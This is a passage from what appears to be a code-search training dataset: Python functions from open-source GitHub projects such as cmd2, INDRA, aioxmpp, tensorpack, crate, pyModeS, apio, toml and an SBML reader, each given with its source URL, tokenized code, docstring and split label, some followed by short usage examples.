[ "Returns", "a", "new", "Constraint", "from", "the", "given", "string", ".", "Uppercase", "words", "indicate", "either", "a", "tag", "(", "NN", "JJ", "VP", ")", "or", "a", "taxonomy", "term", "(", "e", ".", "g", ".", "PRODUCT", "PERSON", ")", ".", "Syntax", ":", "(", "defines", "an", "optional", "constraint", "e", ".", "g", ".", "(", "JJ", ")", ".", "[", "defines", "a", "constraint", "with", "spaces", "e", ".", "g", ".", "[", "Mac", "OS", "X", "|", "Windows", "Vista", "]", ".", "_", "is", "converted", "to", "spaces", "e", ".", "g", ".", "Windows_Vista", ".", "|", "separates", "different", "options", "e", ".", "g", ".", "ADJP|ADVP", ".", "!", "can", "be", "used", "as", "a", "word", "prefix", "to", "disallow", "it", ".", "*", "can", "be", "used", "as", "a", "wildcard", "character", "e", ".", "g", ".", "soft", "*", "|JJ", "*", ".", "?", "as", "a", "suffix", "defines", "a", "constraint", "that", "is", "optional", "e", ".", "g", ".", "JJ?", ".", "+", "as", "a", "suffix", "defines", "a", "constraint", "that", "can", "span", "multiple", "words", "e", ".", "g", ".", "JJ", "+", ".", "^", "as", "a", "prefix", "defines", "a", "constraint", "that", "can", "only", "match", "the", "first", "word", ".", "These", "characters", "need", "to", "be", "escaped", "if", "used", "as", "content", ":", "\\", "(", "." ]
python
train
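The order-insensitive stripping of the ^, +, ?, () and [] wrappers is the core trick; below is a reduced standalone version covering just those flags (escape handling for the remaining special characters is omitted):

def parse_flags(s):
    first = multiple = optional = False
    s = s.strip().strip("{}").strip()
    for _ in range(3):   # wrapping order is ignored, so strip repeatedly
        if s.startswith("^"):
            s, first = s[1:], True
        if s.endswith("+") and not s.endswith("\\+"):
            s, multiple = s[:-1], True
        if s.endswith("?") and not s.endswith("\\?"):
            s, optional = s[:-1], True
        if s.startswith("(") and s.endswith(")"):
            s, optional = s[1:-1], True
        if s.startswith("[") and s.endswith("]"):
            s = s[1:-1]
    return s, first, multiple, optional

print(parse_flags("^(JJ+)"))   # ('JJ', True, True, True)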
python-cmd2/cmd2
cmd2/cmd2.py
https://github.com/python-cmd2/cmd2/blob/b22c0bd891ed08c8b09df56df9d91f48166a5e2a/cmd2/cmd2.py#L2037-L2069
def onecmd(self, statement: Union[Statement, str]) -> bool: """ This executes the actual do_* method for a command. If the command provided doesn't exist, then it executes default() instead. :param statement: intended to be a Statement instance parsed command from the input stream, alternative acceptance of a str is present only for backward compatibility with cmd :return: a flag indicating whether the interpretation of commands should stop """ # For backwards compatibility with cmd, allow a str to be passed in if not isinstance(statement, Statement): statement = self._complete_statement(statement) # Check if this is a macro if statement.command in self.macros: stop = self._run_macro(statement) else: func = self.cmd_func(statement.command) if func: # Check to see if this command should be stored in history if statement.command not in self.exclude_from_history \ and statement.command not in self.disabled_commands: self.history.append(statement) stop = func(statement) else: stop = self.default(statement) if stop is None: stop = False return stop
[ "def", "onecmd", "(", "self", ",", "statement", ":", "Union", "[", "Statement", ",", "str", "]", ")", "->", "bool", ":", "# For backwards compatibility with cmd, allow a str to be passed in", "if", "not", "isinstance", "(", "statement", ",", "Statement", ")", ":", "statement", "=", "self", ".", "_complete_statement", "(", "statement", ")", "# Check if this is a macro", "if", "statement", ".", "command", "in", "self", ".", "macros", ":", "stop", "=", "self", ".", "_run_macro", "(", "statement", ")", "else", ":", "func", "=", "self", ".", "cmd_func", "(", "statement", ".", "command", ")", "if", "func", ":", "# Check to see if this command should be stored in history", "if", "statement", ".", "command", "not", "in", "self", ".", "exclude_from_history", "and", "statement", ".", "command", "not", "in", "self", ".", "disabled_commands", ":", "self", ".", "history", ".", "append", "(", "statement", ")", "stop", "=", "func", "(", "statement", ")", "else", ":", "stop", "=", "self", ".", "default", "(", "statement", ")", "if", "stop", "is", "None", ":", "stop", "=", "False", "return", "stop" ]
This executes the actual do_* method for a command. If the command provided doesn't exist, then it executes default() instead. :param statement: intended to be a Statement instance parsed command from the input stream, alternative acceptance of a str is present only for backward compatibility with cmd :return: a flag indicating whether the interpretation of commands should stop
[ "This", "executes", "the", "actual", "do_", "*", "method", "for", "a", "command", "." ]
python
train
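In normal use onecmd is invoked for you by the command loop; a minimal cmd2 application showing the do_*/default dispatch it performs (macros need no setup here, since they are created at runtime with the built-in `macro` command):

import sys
import cmd2

class App(cmd2.Cmd):
    def do_greet(self, statement):
        """Greet the given name."""
        self.poutput("Hello, {}!".format(statement.args or "world"))

    def default(self, statement):
        self.poutput("unknown command: {}".format(statement.command))

if __name__ == "__main__":
    sys.exit(App().cmdloop())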
sorgerlab/indra
indra/sources/trips/processor.py
https://github.com/sorgerlab/indra/blob/79a70415832c5702d7a820c7c9ccc8e25010124b/indra/sources/trips/processor.py#L1710-L1721
def _stmt_location_to_agents(stmt, location): """Apply an event location to the Agents in the corresponding Statement. If a Statement is in a given location we represent that by requiring all Agents in the Statement to be in that location. """ if location is None: return agents = stmt.agent_list() for a in agents: if a is not None: a.location = location
[ "def", "_stmt_location_to_agents", "(", "stmt", ",", "location", ")", ":", "if", "location", "is", "None", ":", "return", "agents", "=", "stmt", ".", "agent_list", "(", ")", "for", "a", "in", "agents", ":", "if", "a", "is", "not", "None", ":", "a", ".", "location", "=", "location" ]
Apply an event location to the Agents in the corresponding Statement. If a Statement is in a given location we represent that by requiring all Agents in the Statement to be in that location.
[ "Apply", "an", "event", "location", "to", "the", "Agents", "in", "the", "corresponding", "Statement", "." ]
python
train
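The helper above is private to the TRIPS processor, so rather than guess at INDRA's constructors, here is a self-contained mimic of the same pattern; the stand-in Agent and Statement classes are illustrative, not INDRA's real API.
# Self-contained mimic of the pattern above; these stand-in classes are
# illustrative and are not INDRA's real Agent/Statement API.
class Agent:
    def __init__(self, name):
        self.name = name
        self.location = None

class Statement:
    def __init__(self, agents):
        self._agents = agents

    def agent_list(self):
        return self._agents

def _stmt_location_to_agents(stmt, location):
    # identical logic to the function above
    if location is None:
        return
    for a in stmt.agent_list():
        if a is not None:
            a.location = location

stmt = Statement([Agent('MEK'), None, Agent('ERK')])
_stmt_location_to_agents(stmt, 'cytoplasm')
assert all(a.location == 'cytoplasm' for a in stmt.agent_list() if a is not None)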
horazont/aioxmpp
aioxmpp/stringprep.py
https://github.com/horazont/aioxmpp/blob/22a68e5e1d23f2a4dee470092adbd4672f9ef061/aioxmpp/stringprep.py#L107-L117
def check_prohibited_output(chars, bad_tables): """ Check against prohibited output, by checking whether any of the characters from `chars` are in any of the `bad_tables`. Operates in-place on a list of code points from `chars`. """ violator = check_against_tables(chars, bad_tables) if violator is not None: raise ValueError("Input contains invalid unicode codepoint: " "U+{:04x}".format(ord(violator)))
[ "def", "check_prohibited_output", "(", "chars", ",", "bad_tables", ")", ":", "violator", "=", "check_against_tables", "(", "chars", ",", "bad_tables", ")", "if", "violator", "is", "not", "None", ":", "raise", "ValueError", "(", "\"Input contains invalid unicode codepoint: \"", "\"U+{:04x}\"", ".", "format", "(", "ord", "(", "violator", ")", ")", ")" ]
Check against prohibited output, by checking whether any of the characters from `chars` are in any of the `bad_tables`. Operates in-place on a list of code points from `chars`.
[ "Check", "against", "prohibited", "output", "by", "checking", "whether", "any", "of", "the", "characters", "from", "chars", "are", "in", "any", "of", "the", "bad_tables", "." ]
python
train
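To see the behaviour without pulling in aioxmpp's table machinery, here is a self-contained sketch of the same check, with check_against_tables replaced by a simple membership scan; that replacement is an assumption, since the real tables are RFC 3454 stringprep predicates.
# Self-contained sketch of the check above. check_against_tables is
# simplified to a membership scan; aioxmpp's real implementation uses
# RFC 3454 stringprep table predicates.
def check_against_tables(chars, tables):
    for ch in chars:
        if any(ch in table for table in tables):
            return ch
    return None

def check_prohibited_output(chars, bad_tables):
    violator = check_against_tables(chars, bad_tables)
    if violator is not None:
        raise ValueError("Input contains invalid unicode codepoint: "
                         "U+{:04x}".format(ord(violator)))

prohibited = [{'\u0000', '\u202e'}]                  # illustrative "bad" table
check_prohibited_output(list('hello'), prohibited)   # passes silently
# check_prohibited_output(list('x\u202e'), prohibited) would raise ValueError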
inasafe/inasafe
safe/defaults.py
https://github.com/inasafe/inasafe/blob/831d60abba919f6d481dc94a8d988cc205130724/safe/defaults.py#L18-L28
def default_provenance(): """The provenance for the default values. :return: default provenance. :rtype: str """ field = TextParameter() field.name = tr('Provenance') field.description = tr('The provenance of minimum needs') field.value = 'The minimum needs are based on BNPB Perka 7/2008.' return field
[ "def", "default_provenance", "(", ")", ":", "field", "=", "TextParameter", "(", ")", "field", ".", "name", "=", "tr", "(", "'Provenance'", ")", "field", ".", "description", "=", "tr", "(", "'The provenance of minimum needs'", ")", "field", ".", "value", "=", "'The minimum needs are based on BNPB Perka 7/2008.'", "return", "field" ]
The provenance for the default values. :return: default provenance. :rtype: str
[ "The", "provenance", "for", "the", "default", "values", "." ]
python
train
knagra/farnsworth
events/ajax.py
https://github.com/knagra/farnsworth/blob/1b6589f0d9fea154f0a1e2231ed906764ed26d26/events/ajax.py#L12-L37
def build_ajax_rsvps(event, user_profile): """Return link and list strings for a given event.""" if user_profile in event.rsvps.all(): link_string = True else: link_string = False if not event.rsvps.all().count(): list_string = 'No RSVPs.' else: list_string = 'RSVPs:' for counter, profile in enumerate(event.rsvps.all()): if counter > 0: list_string += ',' list_string += \ ' <a class="page_link" title="View Profile" href="{url}">' \ '{name}</a>'.format( url=reverse( 'member_profile', kwargs={'targetUsername': profile.user.username} ), name='You' if profile.user == user_profile.user \ else profile.user.get_full_name(), ) return (link_string, list_string)
[ "def", "build_ajax_rsvps", "(", "event", ",", "user_profile", ")", ":", "if", "user_profile", "in", "event", ".", "rsvps", ".", "all", "(", ")", ":", "link_string", "=", "True", "else", ":", "link_string", "=", "False", "if", "not", "event", ".", "rsvps", ".", "all", "(", ")", ".", "count", "(", ")", ":", "list_string", "=", "'No RSVPs.'", "else", ":", "list_string", "=", "'RSVPs:'", "for", "counter", ",", "profile", "in", "enumerate", "(", "event", ".", "rsvps", ".", "all", "(", ")", ")", ":", "if", "counter", ">", "0", ":", "list_string", "+=", "','", "list_string", "+=", "' <a class=\"page_link\" title=\"View Profile\" href=\"{url}\">'", "'{name}</a>'", ".", "format", "(", "url", "=", "reverse", "(", "'member_profile'", ",", "kwargs", "=", "{", "'targetUsername'", ":", "profile", ".", "user", ".", "username", "}", ")", ",", "name", "=", "'You'", "if", "profile", ".", "user", "==", "user_profile", ".", "user", "else", "profile", ".", "user", ".", "get_full_name", "(", ")", ",", ")", "return", "(", "link_string", ",", "list_string", ")" ]
Return link and list strings for a given event.
[ "Return", "link", "and", "list", "strings", "for", "a", "given", "event", "." ]
python
train
tensorpack/tensorpack
tensorpack/train/base.py
https://github.com/tensorpack/tensorpack/blob/d7a13cb74c9066bc791d7aafc3b744b60ee79a9f/tensorpack/train/base.py#L142-L165
def _register_callback(self, cb): """ Register callbacks to the trainer. It can only be called before :meth:`Trainer.train()`. Args: cb (Callback or [Callback]): a callback or a list of callbacks Returns: succeed or not """ if isinstance(cb, (list, tuple)): for x in cb: self._register_callback(x) return assert isinstance(cb, Callback), cb assert not isinstance(self._callbacks, Callbacks), \ "Cannot register more callbacks after trainer was setup!" if not self.is_chief and cb.chief_only: logger.warn("Callback {} is chief-only, skipped.".format(str(cb))) return False else: self._callbacks.append(cb) return True
[ "def", "_register_callback", "(", "self", ",", "cb", ")", ":", "if", "isinstance", "(", "cb", ",", "(", "list", ",", "tuple", ")", ")", ":", "for", "x", "in", "cb", ":", "self", ".", "_register_callback", "(", "x", ")", "return", "assert", "isinstance", "(", "cb", ",", "Callback", ")", ",", "cb", "assert", "not", "isinstance", "(", "self", ".", "_callbacks", ",", "Callbacks", ")", ",", "\"Cannot register more callbacks after trainer was setup!\"", "if", "not", "self", ".", "is_chief", "and", "cb", ".", "chief_only", ":", "logger", ".", "warn", "(", "\"Callback {} is chief-only, skipped.\"", ".", "format", "(", "str", "(", "cb", ")", ")", ")", "return", "False", "else", ":", "self", ".", "_callbacks", ".", "append", "(", "cb", ")", "return", "True" ]
Register callbacks to the trainer. It can only be called before :meth:`Trainer.train()`. Args: cb (Callback or [Callback]): a callback or a list of callbacks Returns: bool: whether the callback was registered
[ "Register", "callbacks", "to", "the", "trainer", ".", "It", "can", "only", "be", "called", "before", ":", "meth", ":", "Trainer", ".", "train", "()", "." ]
python
train
crate/crate-python
src/crate/client/http.py
https://github.com/crate/crate-python/blob/68e39c95f5bbe88b74bbfa26de4347fc644636a8/src/crate/client/http.py#L369-L378
def blob_get(self, table, digest, chunk_size=1024 * 128): """ Returns a file like object representing the contents of the blob with the given digest. """ response = self._request('GET', _blob_path(table, digest), stream=True) if response.status == 404: raise DigestNotFoundException(table, digest) _raise_for_status(response) return response.stream(amt=chunk_size)
[ "def", "blob_get", "(", "self", ",", "table", ",", "digest", ",", "chunk_size", "=", "1024", "*", "128", ")", ":", "response", "=", "self", ".", "_request", "(", "'GET'", ",", "_blob_path", "(", "table", ",", "digest", ")", ",", "stream", "=", "True", ")", "if", "response", ".", "status", "==", "404", ":", "raise", "DigestNotFoundException", "(", "table", ",", "digest", ")", "_raise_for_status", "(", "response", ")", "return", "response", ".", "stream", "(", "amt", "=", "chunk_size", ")" ]
Returns a file like object representing the contents of the blob with the given digest.
[ "Returns", "a", "file", "like", "object", "representing", "the", "contents", "of", "the", "blob", "with", "the", "given", "digest", "." ]
python
train
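On the caller's side this is typically reached through the connection's blob container rather than the HTTP client directly. A hypothetical sketch follows; the endpoint, container name, and digest are all made up, and the container API names are recalled from crate-python's blob docs rather than taken from this record.
# Hypothetical usage; endpoint, container name, and digest are illustrative.
# BlobContainer.get() ultimately calls blob_get() above and yields the
# response in chunks (128 KiB by default).
from crate import client

conn = client.connect('http://localhost:4200')      # made-up CrateDB endpoint
container = conn.get_blob_container('myblobs')      # made-up container name
digest = 'aaaa1111bbbb2222cccc3333dddd4444eeee5555' # made-up SHA-1 digest
with open('blob.bin', 'wb') as out:
    for chunk in container.get(digest):
        out.write(chunk)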
junzis/pyModeS
pyModeS/decoder/bds/bds40.py
https://github.com/junzis/pyModeS/blob/8cd5655a04b08171a9ad5f1ffd232b7e0178ea53/pyModeS/decoder/bds/bds40.py#L25-L65
def is40(msg): """Check if a message is likely to be BDS code 4,0 Args: msg (String): 28 bytes hexadecimal message string Returns: bool: True or False """ if allzeros(msg): return False d = hex2bin(data(msg)) # status bit 1, 14, and 27 if wrongstatus(d, 1, 2, 13): return False if wrongstatus(d, 14, 15, 26): return False if wrongstatus(d, 27, 28, 39): return False if wrongstatus(d, 48, 49, 51): return False if wrongstatus(d, 54, 55, 56): return False # bits 40-47 and 52-53 shall all be zero if bin2int(d[39:47]) != 0: return False if bin2int(d[51:53]) != 0: return False return True
[ "def", "is40", "(", "msg", ")", ":", "if", "allzeros", "(", "msg", ")", ":", "return", "False", "d", "=", "hex2bin", "(", "data", "(", "msg", ")", ")", "# status bit 1, 14, and 27", "if", "wrongstatus", "(", "d", ",", "1", ",", "2", ",", "13", ")", ":", "return", "False", "if", "wrongstatus", "(", "d", ",", "14", ",", "15", ",", "26", ")", ":", "return", "False", "if", "wrongstatus", "(", "d", ",", "27", ",", "28", ",", "39", ")", ":", "return", "False", "if", "wrongstatus", "(", "d", ",", "48", ",", "49", ",", "51", ")", ":", "return", "False", "if", "wrongstatus", "(", "d", ",", "54", ",", "55", ",", "56", ")", ":", "return", "False", "# bits 40-47 and 52-53 shall all be zero", "if", "bin2int", "(", "d", "[", "39", ":", "47", "]", ")", "!=", "0", ":", "return", "False", "if", "bin2int", "(", "d", "[", "51", ":", "53", "]", ")", "!=", "0", ":", "return", "False", "return", "True" ]
Check if a message is likely to be BDS code 4,0 Args: msg (String): 28-character hexadecimal message string Returns: bool: True or False
[ "Check", "if", "a", "message", "is", "likely", "to", "be", "BDS", "code", "4", "0" ]
python
train
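A quick usage sketch for the heuristic above; the hex message below is made up for illustration, not a captured frame, so the printed result is only an example.
# Hypothetical usage; the message string is illustrative, not real traffic.
from pyModeS.decoder.bds import bds40

msg = 'A000139381C8F7B3CD4750A1D0D5'   # made-up 28-character hex string
print(bds40.is40(msg))                 # heuristic True/False for BDS 4,0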
patrickfuller/imolecule
imolecule/json_formatter.py
https://github.com/patrickfuller/imolecule/blob/07e91600c805123935a78782871414754bd3696d/imolecule/json_formatter.py#L37-L45
def default(self, obj): """Fired when an unserializable object is hit.""" if hasattr(obj, '__dict__'): return obj.__dict__.copy() elif HAS_NUMPY and isinstance(obj, np.ndarray): return obj.copy().tolist() else: raise TypeError(("Object of type {:s} with value of {:s} is not " "JSON serializable").format(type(obj), repr(obj)))
[ "def", "default", "(", "self", ",", "obj", ")", ":", "if", "hasattr", "(", "obj", ",", "'__dict__'", ")", ":", "return", "obj", ".", "__dict__", ".", "copy", "(", ")", "elif", "HAS_NUMPY", "and", "isinstance", "(", "obj", ",", "np", ".", "ndarray", ")", ":", "return", "obj", ".", "copy", "(", ")", ".", "tolist", "(", ")", "else", ":", "raise", "TypeError", "(", "(", "\"Object of type {:s} with value of {:s} is not \"", "\"JSON serializable\"", ")", ".", "format", "(", "type", "(", "obj", ")", ",", "repr", "(", "obj", ")", ")", ")" ]
Fired when an unserializable object is hit.
[ "Fired", "when", "an", "unserializable", "object", "is", "hit", "." ]
python
train
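The method above belongs to a json.JSONEncoder subclass; a self-contained sketch of the same hook follows (the class name CustomEncoder is made up for illustration).
# Self-contained sketch of the hook above; CustomEncoder is a made-up name.
# Objects fall back to their __dict__, and numpy arrays (when numpy is
# available) become nested lists.
import json

try:
    import numpy as np
    HAS_NUMPY = True
except ImportError:
    HAS_NUMPY = False

class CustomEncoder(json.JSONEncoder):
    def default(self, obj):
        if hasattr(obj, '__dict__'):
            return obj.__dict__.copy()
        elif HAS_NUMPY and isinstance(obj, np.ndarray):
            return obj.copy().tolist()
        raise TypeError('not serializable: {!r}'.format(obj))

class Atom:
    def __init__(self, element):
        self.element = element

print(json.dumps({'atom': Atom('C')}, cls=CustomEncoder))
# {"atom": {"element": "C"}}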
zakdoek/django-simple-resizer
simple_resizer/__init__.py
https://github.com/zakdoek/django-simple-resizer/blob/5614eb1717948c65d179c3d1567439a8c90a4d44/simple_resizer/__init__.py#L60-L144
def _resize(image, width, height, crop): """ Resize the image with respect to the aspect ratio """ ext = os.path.splitext(image.name)[1].strip(".") with Image(file=image, format=ext) as b_image: # Account for orientation if ORIENTATION_TYPES.index(b_image.orientation) > 4: # Flip target_aspect = float(width) / float(height) aspect = float(b_image.height) / float(b_image.width) else: target_aspect = float(width) / float(height) aspect = float(b_image.width) / float(b_image.height) # Fix rotation b_image.auto_orient() # Calculate target size target_aspect = float(width) / float(height) aspect = float(b_image.width) / float(b_image.height) if ((target_aspect > aspect and not crop) or (target_aspect <= aspect and crop)): # target is wider than image, set height as maximum target_height = height # calculate width # - iw / ih = tw / th (keep aspect) # => th ( iw / ih ) = tw target_width = float(target_height) * aspect if crop: # calculate crop coords # - ( tw - w ) / 2 target_left = (float(target_width) - float(width)) / 2 target_left = int(round(target_left)) target_top = 0 # correct floating point error, and convert to int, round in the # direction of the requested width if width >= target_width: target_width = int(math.ceil(target_width)) else: target_width = int(math.floor(target_width)) else: # image is wider than target, set width as maximum target_width = width # calculate height # - iw / ih = tw / th (keep aspect) # => tw / ( iw / ih ) = th target_height = float(target_width) / aspect if crop: # calculate crop coords # - ( th - h ) / 2 target_top = (float(target_height) - float(height)) / 2 target_top = int(round(target_top)) target_left = 0 # correct floating point error and convert to int if height >= target_height: target_height = int(math.ceil(target_height)) else: target_height = int(math.floor(target_height)) # strip color profiles b_image.strip() # Resize b_image.resize(target_width, target_height) if crop: # Crop to target b_image.crop(left=target_left, top=target_top, width=width, height=height) # Save to temporary file temp_file = tempfile.TemporaryFile() b_image.save(file=temp_file) # Rewind the file temp_file.seek(0) return temp_file
[ "def", "_resize", "(", "image", ",", "width", ",", "height", ",", "crop", ")", ":", "ext", "=", "os", ".", "path", ".", "splitext", "(", "image", ".", "name", ")", "[", "1", "]", ".", "strip", "(", "\".\"", ")", "with", "Image", "(", "file", "=", "image", ",", "format", "=", "ext", ")", "as", "b_image", ":", "# Account for orientation", "if", "ORIENTATION_TYPES", ".", "index", "(", "b_image", ".", "orientation", ")", ">", "4", ":", "# Flip", "target_aspect", "=", "float", "(", "width", ")", "/", "float", "(", "height", ")", "aspect", "=", "float", "(", "b_image", ".", "height", ")", "/", "float", "(", "b_image", ".", "width", ")", "else", ":", "target_aspect", "=", "float", "(", "width", ")", "/", "float", "(", "height", ")", "aspect", "=", "float", "(", "b_image", ".", "width", ")", "/", "float", "(", "b_image", ".", "height", ")", "# Fix rotation", "b_image", ".", "auto_orient", "(", ")", "# Calculate target size", "target_aspect", "=", "float", "(", "width", ")", "/", "float", "(", "height", ")", "aspect", "=", "float", "(", "b_image", ".", "width", ")", "/", "float", "(", "b_image", ".", "height", ")", "if", "(", "(", "target_aspect", ">", "aspect", "and", "not", "crop", ")", "or", "(", "target_aspect", "<=", "aspect", "and", "crop", ")", ")", ":", "# target is wider than image, set height as maximum", "target_height", "=", "height", "# calculate width", "# - iw / ih = tw / th (keep aspect)", "# => th ( iw / ih ) = tw", "target_width", "=", "float", "(", "target_height", ")", "*", "aspect", "if", "crop", ":", "# calculate crop coords", "# - ( tw - w ) / 2", "target_left", "=", "(", "float", "(", "target_width", ")", "-", "float", "(", "width", ")", ")", "/", "2", "target_left", "=", "int", "(", "round", "(", "target_left", ")", ")", "target_top", "=", "0", "# correct floating point error, and convert to int, round in the", "# direction of the requested width", "if", "width", ">=", "target_width", ":", "target_width", "=", "int", "(", "math", ".", "ceil", "(", "target_width", ")", ")", "else", ":", "target_width", "=", "int", "(", "math", ".", "floor", "(", "target_width", ")", ")", "else", ":", "# image is wider than target, set width as maximum", "target_width", "=", "width", "# calculate height", "# - iw / ih = tw / th (keep aspect)", "# => tw / ( iw / ih ) = th", "target_height", "=", "float", "(", "target_width", ")", "/", "aspect", "if", "crop", ":", "# calculate crop coords", "# - ( th - h ) / 2", "target_top", "=", "(", "float", "(", "target_height", ")", "-", "float", "(", "height", ")", ")", "/", "2", "target_top", "=", "int", "(", "round", "(", "target_top", ")", ")", "target_left", "=", "0", "# correct floating point error and convert to int", "if", "height", ">=", "target_height", ":", "target_height", "=", "int", "(", "math", ".", "ceil", "(", "target_height", ")", ")", "else", ":", "target_height", "=", "int", "(", "math", ".", "floor", "(", "target_height", ")", ")", "# strip color profiles", "b_image", ".", "strip", "(", ")", "# Resize", "b_image", ".", "resize", "(", "target_width", ",", "target_height", ")", "if", "crop", ":", "# Crop to target", "b_image", ".", "crop", "(", "left", "=", "target_left", ",", "top", "=", "target_top", ",", "width", "=", "width", ",", "height", "=", "height", ")", "# Save to temporary file", "temp_file", "=", "tempfile", ".", "TemporaryFile", "(", ")", "b_image", ".", "save", "(", "file", "=", "temp_file", ")", "# Rewind the file", "temp_file", ".", "seek", "(", "0", ")", "return", "temp_file" ]
Resize the image with respect to the aspect ratio
[ "Resize", "the", "image", "with", "respect", "to", "the", "aspect", "ratio" ]
python
train
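The sizing arithmetic above is independent of Wand, so the crop branch can be checked by hand; the 400x300 source and 200x200 target below are chosen for illustration. The source aspect 4/3 exceeds the target aspect 1, so with crop enabled the height becomes the maximum, the width scales to about 267, and the left crop offset is about 33.
# Worked example of the crop-branch arithmetic above (pure Python, no Wand);
# the 400x300 -> 200x200 numbers are chosen for illustration.
import math

src_w, src_h, width, height = 400, 300, 200, 200
target_aspect = float(width) / float(height)   # 1.0
aspect = float(src_w) / float(src_h)           # ~1.333
assert target_aspect <= aspect                 # crop branch: height is the maximum
target_height = height                         # 200
target_width = float(target_height) * aspect   # ~266.67
target_left = int(round((target_width - width) / 2))   # 33
target_width = int(math.floor(target_width))           # 266
print(target_width, target_height, target_left)        # 266 200 33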
FPGAwars/apio
apio/managers/scons.py
https://github.com/FPGAwars/apio/blob/5c6310f11a061a760764c6b5847bfb431dc3d0bc/apio/managers/scons.py#L301-L326
def run(self, command, variables=[], board=None, packages=[]): """Executes scons for building""" # -- Check for the SConstruct file if not isfile(util.safe_join(util.get_project_dir(), 'SConstruct')): variables += ['-f'] variables += [util.safe_join( util.get_folder('resources'), 'SConstruct')] else: click.secho('Info: use custom SConstruct file') # -- Resolve packages if self.profile.check_exe_default(): # Run on `default` config mode if not util.resolve_packages( packages, self.profile.packages, self.resources.distribution.get('packages') ): # Exit if a package is not installed raise Exception else: click.secho('Info: native config mode') # -- Execute scons return self._execute_scons(command, variables, board)
[ "def", "run", "(", "self", ",", "command", ",", "variables", "=", "[", "]", ",", "board", "=", "None", ",", "packages", "=", "[", "]", ")", ":", "# -- Check for the SConstruct file", "if", "not", "isfile", "(", "util", ".", "safe_join", "(", "util", ".", "get_project_dir", "(", ")", ",", "'SConstruct'", ")", ")", ":", "variables", "+=", "[", "'-f'", "]", "variables", "+=", "[", "util", ".", "safe_join", "(", "util", ".", "get_folder", "(", "'resources'", ")", ",", "'SConstruct'", ")", "]", "else", ":", "click", ".", "secho", "(", "'Info: use custom SConstruct file'", ")", "# -- Resolve packages", "if", "self", ".", "profile", ".", "check_exe_default", "(", ")", ":", "# Run on `default` config mode", "if", "not", "util", ".", "resolve_packages", "(", "packages", ",", "self", ".", "profile", ".", "packages", ",", "self", ".", "resources", ".", "distribution", ".", "get", "(", "'packages'", ")", ")", ":", "# Exit if a package is not installed", "raise", "Exception", "else", ":", "click", ".", "secho", "(", "'Info: native config mode'", ")", "# -- Execute scons", "return", "self", ".", "_execute_scons", "(", "command", ",", "variables", ",", "board", ")" ]
Executes scons for building
[ "Executes", "scons", "for", "building" ]
python
train
pypa/pipenv
pipenv/vendor/toml/encoder.py
https://github.com/pypa/pipenv/blob/cae8d76c210b9777e90aab76e9c4b0e53bb19cde/pipenv/vendor/toml/encoder.py#L11-L29
def dump(o, f):
    """Writes out a dict as TOML to a file

    Args:
        o: Object to dump into toml
        f: File descriptor where the toml should be stored

    Returns:
        String containing the TOML corresponding to the dictionary

    Raises:
        TypeError: When anything other than a file descriptor is passed
    """

    if not f.write:
        raise TypeError("You can only dump an object to a file descriptor")
    d = dumps(o)
    f.write(d)
    return d
[ "def", "dump", "(", "o", ",", "f", ")", ":", "if", "not", "f", ".", "write", ":", "raise", "TypeError", "(", "\"You can only dump an object to a file descriptor\"", ")", "d", "=", "dumps", "(", "o", ")", "f", ".", "write", "(", "d", ")", "return", "d" ]
Writes out a dict as TOML to a file Args: o: Object to dump into toml f: File descriptor where the toml should be stored Returns: String containing the TOML corresponding to the dictionary Raises: TypeError: When anything other than a file descriptor is passed
[ "Writes", "out", "a", "dict", "as", "TOML", "to", "a", "file" ]
python
train
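Usage follows the familiar json-style pattern; the filename and payload below are illustrative.
# Usage sketch for dump() above; filename and payload are illustrative.
import toml

config = {'server': {'host': 'localhost', 'port': 8080}}
with open('config.toml', 'w') as f:
    text = toml.dump(config, f)   # writes the file and returns the TOML text
print(text)
# [server]
# host = "localhost"
# port = 8080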
wangwenpei/fantasy
fantasy/utils.py
https://github.com/wangwenpei/fantasy/blob/0fe92059bd868f14da84235beb05b217b1d46e4a/fantasy/utils.py#L29-L38
def config_value(key, app=None, default=None, prefix='hive_'):
    """Get a Flask-Security configuration value.

    :param key: The configuration key without the prefix (`HIVE_` by default)
    :param app: An optional specific application to inspect. Defaults to
                Flask's `current_app`
    :param default: An optional default value if the value is not set
    """
    app = app or current_app
    return get_config(app, prefix=prefix).get(key.upper(), default)
[ "def", "config_value", "(", "key", ",", "app", "=", "None", ",", "default", "=", "None", ",", "prefix", "=", "'hive_'", ")", ":", "app", "=", "app", "or", "current_app", "return", "get_config", "(", "app", ",", "prefix", "=", "prefix", ")", ".", "get", "(", "key", ".", "upper", "(", ")", ",", "default", ")" ]
Get a Flask-Security configuration value. :param key: The configuration key without the prefix (`HIVE_` by default) :param app: An optional specific application to inspect. Defaults to Flask's `current_app` :param default: An optional default value if the value is not set
[ "Get", "a", "Flask", "-", "Security", "configuration", "value", "." ]
python
test
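Assuming get_config() returns the app.config entries whose names start with the upper-cased prefix, with that prefix stripped (which the .get(key.upper(), ...) lookup implies), usage would look like this sketch; the HIVE_PAGE_SIZE key is made up for illustration.
# Hypothetical usage; assumes get_config() strips the upper-cased prefix
# from matching app.config keys. HIVE_PAGE_SIZE is a made-up key.
from flask import Flask
from fantasy.utils import config_value   # module path as given above

app = Flask(__name__)
app.config['HIVE_PAGE_SIZE'] = 20

with app.app_context():
    size = config_value('page_size', default=10)   # expected: 20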
theosysbio/means
src/means/io/sbml.py
https://github.com/theosysbio/means/blob/fe164916a1d84ab2a4fa039871d38ccdf638b1db/src/means/io/sbml.py#L55-L125
def read_sbml(filename): """ Read the model from a SBML file. :param filename: SBML filename to read the model from :return: A tuple, consisting of :class:`~means.core.model.Model` instance, set of parameter values, and set of initial conditions variables. """ import libsbml if not os.path.exists(filename): raise IOError('File {0!r} does not exist'.format(filename)) reader = libsbml.SBMLReader() document = reader.readSBML(filename) sbml_model = document.getModel() if not sbml_model: raise ValueError('Cannot parse SBML model from {0!r}'.format(filename)) species = sympy.symbols([s.getId() for s in sbml_model.getListOfSpecies()]) initial_conditions = [s.getInitialConcentration() for s in sbml_model.getListOfSpecies()] compartments = sympy.symbols([s.getId() for s in sbml_model.getListOfCompartments()]) compartment_sizes = [s.getSize() for s in sbml_model.getListOfCompartments()] reactions = map(_parse_reaction, sbml_model.getListOfReactions()) # getListOfParameters is an attribute of the model for SBML Level 1&2 parameters_with_values = [(sympy.Symbol(p.getId()), p.getValue()) for p in sbml_model.getListOfParameters()] parameter_values = dict(parameters_with_values) parameters = map(lambda x: x[0], parameters_with_values) if not parameters: track_local_parameters = True parameters = set() parameter_values = {} else: track_local_parameters = False stoichiometry_matrix = np.zeros((len(species), len(reactions)), dtype=int) propensities = [] for reaction_index, reaction in enumerate(reactions): if track_local_parameters: for 